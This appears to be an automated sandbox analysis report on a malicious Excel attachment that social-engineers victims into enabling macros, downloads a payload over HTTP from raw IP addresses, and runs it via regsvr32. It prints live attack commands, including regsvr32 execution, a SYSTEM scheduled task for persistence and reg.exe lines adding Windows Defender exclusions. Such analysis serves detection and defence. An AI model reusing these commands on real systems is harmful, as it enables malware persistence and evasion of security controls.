Windows Analysis Report Compensation-2308017-09272021.xls

Overview

General Information

Sample Name: Compensation-2308017-09272021.xls
Analysis ID: 491573
MD5: 52b4fcf57e4fb524cf33503e8a5272ef
SHA1: d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
SHA256: a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
Tags: xls
Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW, 11_2_000EAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW, 12_2_1000AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.7516903935[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 33MB

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:56 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:59 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:03:00 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4 Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
PE file has nameless sections
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Deletes files inside the Windows folder
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10016EB0 4_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10012346 4_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10011758 4_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10014FC0 4_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00096EB0 5_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00092346 5_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00091758 5_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00094FC0 5_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 8_2_005E2C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A 8_2_005E242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 8_2_005E3726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1424 8_2_005E1424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1C5D 8_2_005E1C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E34DA 8_2_005E34DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3073 8_2_005E3073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E32EB 8_2_005E32EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4162 8_2_005E4162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005EB114 8_2_005EB114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4495 8_2_005E4495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1D89 8_2_005E1D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1000 8_2_005E1000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E1827 8_2_005E1827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10016EB0 8_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10012346 8_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10011758 8_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10014FC0 8_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F6EB0 11_2_000F6EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F2346 11_2_000F2346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F1758 11_2_000F1758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000F4FC0 11_2_000F4FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D242A 12_2_001D242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1424 12_2_001D1424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D3726 12_2_001D3726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D2C41 12_2_001D2C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4495 12_2_001D4495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001DB114 12_2_001DB114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1D89 12_2_001D1D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1000 12_2_001D1000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1827 12_2_001D1827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D1C5D 12_2_001D1C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D34DA 12_2_001D34DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D3073 12_2_001D3073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D32EB 12_2_001D32EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4162 12_2_001D4162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10016EB0 12_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10012346 12_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10011758 12_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10014FC0 12_2_10014FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: Compensation-2308017-09272021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 12_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 12_2_1000CB77
PE file does not import any functions
Source: Drezd.red.5.dr Static PE information: No import functions for PE file found
Source: Drezd1.red.11.dr Static PE information: No import functions for PE file found
Source: Drezd2.red.17.dr Static PE information: No import functions for PE file found
Source: Drezd.red.14.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
Document contains embedded VBA macros
Source: Compensation-2308017-09272021.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................3..........&A.....(.P.............8.......`.........................................................................3.....
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Windows\System32\reg.exe Console Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF102.tmp
Source: classification engine Classification label: mal100.expl.evad.winXLS@34/15@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7
Source: Compensation-2308017-09272021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{526DFF4B-742D-4615-933D-F361B4AFFD72}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{526DFF4B-742D-4615-933D-F361B4AFFD72}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001A00E push ebx; ret 4_2_1001A00F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001D485 push FFFFFF8Ah; iretd 4_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001D4B6 push FFFFFF8Ah; iretd 4_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10019D5C push cs; iretd 4_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10019E5E push cs; iretd 4_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1001BB29 push esi; iretd 4_2_1001BB2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009A00E push ebx; ret 5_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009D485 push FFFFFF8Ah; iretd 5_2_0009D50E
